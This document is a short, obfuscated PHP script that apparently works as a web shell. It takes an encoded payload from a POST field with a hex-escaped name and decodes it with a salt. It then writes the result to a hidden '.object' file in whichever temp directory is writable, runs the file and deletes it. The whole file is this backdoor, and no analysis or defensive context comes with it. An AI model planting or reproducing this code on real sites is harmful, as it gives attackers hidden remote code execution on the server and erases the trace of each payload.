<?php

if(@$_POST["dat\x61\x5F\x63\x68\x75nk"] !== null){
	$ent = array_filter([getcwd(), "/tmp", "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), session_save_path(), "/dev/shm", ini_get("upload_tmp_dir")]);
	$descriptor = $_POST["dat\x61\x5F\x63\x68\x75nk"];
	$descriptor  = 	 explode	 	(	'.'	, $descriptor   ); 
	$data = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen(	$salt);
            $s = 0;
    
            while(	$s < count(	$descriptor)) {
                $v1 = $descriptor[$s];
                $chS = ord(	$salt[$s % $lenS]);
                $d =(	(	int)$v1 - $chS -(	$s % 10)) ^ 1;
                $data.=chr(	$d);
                $s++;}
	foreach ($ent as $marker):
    		if (is_dir($marker) ? is_writable($marker) : false) {
    $bind = join("/", [$marker, ".object"]);
    if (file_put_contents($bind, $data)) {
	require $bind;
	unlink($bind);
	exit;
}
}
endforeach;
}